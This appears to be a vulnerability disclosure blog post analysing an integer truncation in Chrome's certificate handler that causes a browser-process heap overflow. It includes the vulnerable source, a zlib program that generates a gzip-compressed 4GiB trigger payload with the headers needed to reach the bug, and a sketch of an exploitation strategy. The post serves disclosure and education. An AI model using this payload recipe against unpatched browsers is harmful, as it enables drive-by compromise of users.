Posted by Mark Brand, Truncator of Integers
This is going to be a quick post describing a particularly interesting Chrome issue that I found last month: how I found it, and what is interesting about it.
I was looking through some Chrome networking code when I noticed an API design choice that piqued my interest: the IOBuffer interface. IOBuffers are used throughout the networking stack to manage buffer lifetimes, and there are a few things that are interesting about them:
class NET_EXPORT IOBuffer : public base::RefCountedThreadSafe<IOBuffer> {
 public:
  IOBuffer();
  explicit IOBuffer(int buffer_size);

  char* data() { return data_; }

 protected:
  friend class base::RefCountedThreadSafe<IOBuffer>;

  // Only allow derived classes to specify data_.
  // In all other cases, we own data_, and must delete it at destruction time.
  explicit IOBuffer(char* data);

  virtual ~IOBuffer();

  char* data_;
};
So, there are several questions that I immediately want to ask about the design of this interface, but we’ll stay on track with the question that leads us to the bug: why does the constructor take an int for the buffer_size parameter?
Why is this interesting? There are perhaps too many integer types in C/C++, and their misuse is a common cause of vulnerabilities. The language has a specific type for representing the sizes of objects: size_t. It’s perhaps relevant to quote the C standard here:
‘The types used for size_t and ptrdiff_t should not have an integer conversion rank greater than that of signed long int unless the implementation supports objects large enough to make this necessary’
I assume that this recommendation was made precisely to prevent this kind of issue from occurring: having int and size_t be compatible types would make things safer for programmers who have been taught that int is always the correct numerical type to use. For completeness’ sake, I’ll note that the other potential issue here is one of signedness: size_t is required to be an unsigned type, so the ranges of size_t and int differ even on systems where they have the same bit-width. However, the case of a conversion resulting in a negative length is handled correctly in the IOBuffer constructor.
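To make that signedness case concrete, here is a small standalone sketch. Note that ToyBuffer and the assertion are hypothetical stand-ins of my own, not the actual Chromium code; the real IOBuffer constructor does its own check on buffer_size:

#include <cassert>
#include <cstddef>

// Hypothetical standalone model (not Chromium source) of a size-checked
// constructor: a negative buffer_size is caught before allocation.
struct ToyBuffer {
  explicit ToyBuffer(int buffer_size) {
    assert(buffer_size >= 0);  // a size that wrapped to negative aborts here
    data_ = new char[buffer_size];
  }
  ~ToyBuffer() { delete[] data_; }
  char* data_;
};

int main() {
  // A size_t in [2^31, 2^32) converts to a negative int on typical LP64
  // platforms, so this constructor call trips the assertion instead of
  // silently making a small allocation.
  size_t len = 0x80000000;
  ToyBuffer buf(static_cast<int>(len));
  (void)buf;
  return 0;
}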
Now, on x86_64 with gcc and clang, an int is still a 32-bit integer type, but since we can have allocations larger than 2^32 bytes, size_t is necessarily a 64-bit integer type. So in any location where we use a size_t value to initialise an IOBuffer instance, we risk truncating the size and allocating a smaller buffer than we expect. It turns out that in content::CertificateResourceHandler, which handles the mime-type ‘application/x-x509-user-cert’, that is exactly what’s going to happen. This is quite a simple class: it stores chunks of a certificate in an internal list as they are received, totals their length, and then reassembles the chunks.
bool CertificateResourceHandler::OnReadCompleted(int bytes_read, bool* defer) {
  if (!bytes_read)
    return true;

  // We have more data to read.
  DCHECK(read_buffer_.get());
  content_length_ += bytes_read;
  // Release the ownership of the buffer, and store a reference
  // to it. A new one will be allocated in OnWillRead().
  scoped_refptr<net::IOBuffer> buffer;
  read_buffer_.swap(buffer);
  // TODO(gauravsh): Should this be handled by a separate thread?
  buffer_.push_back(std::make_pair(buffer, bytes_read));

  return true;
}
We’re summing the lengths into a member variable, content_length_ (which is of type ‘size_t’), and we then encounter the truncation issue discussed above when we come to put the pieces back together.
void CertificateResourceHandler::AssembleResource() {
  // 0-length IOBuffers are not allowed.
  if (content_length_ == 0) {
    resource_buffer_ = NULL;
    return;
  }

  // Create the new buffer.
  resource_buffer_ = new net::IOBuffer(content_length_);  // allocation truncated

  // Copy the data into it.
  size_t bytes_copied = 0;
  for (size_t i = 0; i < buffer_.size(); ++i) {
    net::IOBuffer* data = buffer_[i].first.get();
    size_t data_len = buffer_[i].second;
    DCHECK(data != NULL);
    DCHECK_LE(bytes_copied + data_len, content_length_);
    memcpy(resource_buffer_->data() + bytes_copied, data->data(), data_len);  // heap corruption will occur here
    bytes_copied += data_len;
  }
  DCHECK_EQ(content_length_, bytes_copied);
}
So, we can serve up a certificate with a ridiculously long length, for example 0x100001000 bytes, and once this has all made it down the HTTP pipe to Chrome, we’ll try to copy those many, many bytes into a buffer of (int)0x100001000 bytes.
Truncation will happen like this:
size_t  00000001 00001000
int              00001000
And it’s pretty easy to see that bad things are now going to happen. See the tracker for a crash PoC.
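For the curious, here is a minimal standalone sketch (mine, not part of the original PoC) that reproduces the arithmetic on a typical LP64 system:

#include <cstddef>
#include <cstdio>

int main() {
  // The attacker-controlled total length: just over 4 gigabytes.
  size_t content_length = 0x100001000;

  // The implicit conversion at the IOBuffer(int) call site keeps only the
  // low 32 bits on typical LP64 implementations.
  int truncated = static_cast<int>(content_length);

  printf("size_t value: 0x%zx\n", content_length);  // 0x100001000
  printf("int value:    0x%x\n", truncated);        // 0x1000 == 4096
  return 0;
}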
Now, the more astute reader will point out that I just sent over 4 gigabytes of data over the internet, and that this can’t really be all that interesting - but that argument is readily countered with gzip encoding, which reduces the required data to roughly a 4 megabyte payload. Of course, you do need to wait a little while for Chrome to decompress it all; something like 30 seconds for me; but this is not a major issue, as the decompression takes place on a background thread in the browser process and will not really be noticeable, except for high processor usage.
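To give a feel for how cheap such a payload is to produce, here is a rough sketch using zlib; the file name, chunk size, and the choice of zlib itself are my own illustrative assumptions, and any gzip implementation would do:

#include <zlib.h>

#include <cstdio>
#include <cstring>
#include <vector>

int main() {
  const size_t kTotal = 0x100001000ULL;        // just over 4GiB of zero bytes
  std::vector<unsigned char> in(1 << 20, 0);   // feed 1MiB of zeroes at a time
  std::vector<unsigned char> out(1 << 20);

  z_stream strm;
  memset(&strm, 0, sizeof(strm));
  // windowBits of 15 + 16 tells zlib to emit a gzip-wrapped stream, which is
  // what Content-Encoding: gzip expects.
  if (deflateInit2(&strm, Z_BEST_COMPRESSION, Z_DEFLATED, 15 + 16, 8,
                   Z_DEFAULT_STRATEGY) != Z_OK)
    return 1;

  FILE* f = fopen("body.gz", "wb");
  if (!f)
    return 1;

  size_t remaining = kTotal;
  while (remaining > 0) {
    size_t chunk = remaining < in.size() ? remaining : in.size();
    strm.next_in = in.data();
    strm.avail_in = static_cast<uInt>(chunk);
    remaining -= chunk;
    int flush = (remaining == 0) ? Z_FINISH : Z_NO_FLUSH;
    // Drain the compressor; highly repetitive input compresses ~1000:1.
    do {
      strm.next_out = out.data();
      strm.avail_out = static_cast<uInt>(out.size());
      deflate(&strm, flush);
      fwrite(out.data(), 1, out.size() - strm.avail_out, f);
    } while (strm.avail_out == 0);
  }

  deflateEnd(&strm);
  fclose(f);
  return 0;
}

Serving the resulting file with ‘Content-Type: application/x-x509-user-cert’ and ‘Content-Encoding: gzip’ headers is then enough to reach the vulnerable path.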
And that leads us to probably the most interesting thing about this bug: it’s taking place in the browser process. For those not familiar with the Chrome sandbox model, http://blog.azimuthsecurity.com/2010/05/chrome-sandbox-part-1-of-3-overview.html is a nice introduction. The browser process is the trusted, unsandboxed process, which makes this a full-compromise issue: a single bug potentially resulting in unsandboxed arbitrary code execution from a drive-by.
This is a little bit scary, considering that typical Pwnium entries consist of quite lengthy and convoluted bug chains. It serves to highlight the importance of minimizing the unsandboxed attack surface.
It’s going to be a difficult issue to exploit: even on a 64-bit system, surviving a 4-gigabyte out-of-bounds memcpy is a nontrivial problem. To make things worse, the browser process is constantly being interacted with by all the live renderer processes, so achieving a deterministic heap layout is going to be a serious challenge. But, as in this Safari exploit, if stable exploitation is possible, the first step is likely to be arranging for the heap corruption caused by the overflow to corrupt the buffer_ vector itself, so that we can control the size of the overflow.